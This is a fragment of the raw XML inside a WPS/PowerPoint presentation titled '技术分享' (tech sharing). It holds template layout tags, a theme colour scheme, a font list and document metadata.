  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_b"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_UNIT_SHOW_EDIT_AREA_INDICATION" val="1"/>
  <p:tag name="KSO_WM_TEMPLATE_THUMBS_INDEX" val="1、4、7、12、13、14、15、16、17、18、20、24、25、28、33、36、40、43、44"/>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452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23"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_b_e"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1_1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag147.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Part  01"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14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149.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23_15*l_h_f*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="点击此处添加正文"/>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523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523"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_i_h"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1_2"/>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BK_DARK_LIGHT" val="2"/>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9*i*2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="2020452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9*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="2020452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523_9*h_i*2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_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523_9*h_i*1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_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523_9*h_i*1_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_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9*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6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67.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7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78.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523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523"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_i_h"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1_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BK_DARK_LIGHT" val="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9*i*2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="2020452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9*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>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523_9*h_i*2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_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523_9*h_i*1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_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523_9*h_i*1_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_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9*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8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192.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194.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23_15*l_h_f*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="点击此处添加正文"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>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523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2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10*i*1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_BK_DARK_LIGHT" val="2"/>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23_10*i*2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>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23_10*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="2020452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23_10*a*1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加大标题"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag204.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523_10*z*1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_BK_DARK_LIGHT" val="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23_15"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_MASTER_TYPE" val="1"/>
  <p:tag name="KSO_WM_TEMPLATE_COLOR_TYPE" val="1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_SLIDE_SUBTYPE" val="diag"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="1"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="15"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="723.5*43.55"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="118.25*303.851"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-2"/>
  <p:tag name="KSO_WM_SLIDE_DIAGTYPE" val="l"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="i_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag206.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23_15*i*1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>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23_15*l_h_a*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>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23_15*i*2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1"/>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23_15*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20204523"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>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9、12、13、18、21、22、24、25、28、33、37、40、41、42"/>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2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06">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="EFEBE5"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FDFCFC"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C5B371"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B2C97A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="74BA7C"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="85D799"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="6EC4B2"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="6BAAC3"/>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1345</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>165</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汉仪旗黑-85S</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Office 主题​​</vt:lpstr>
      <vt:lpstr>技术分享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技术分享</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy>赵桐01</cp:lastModifiedBy>
  <cp:revision>245</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-19T02:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-27T06:37:10Z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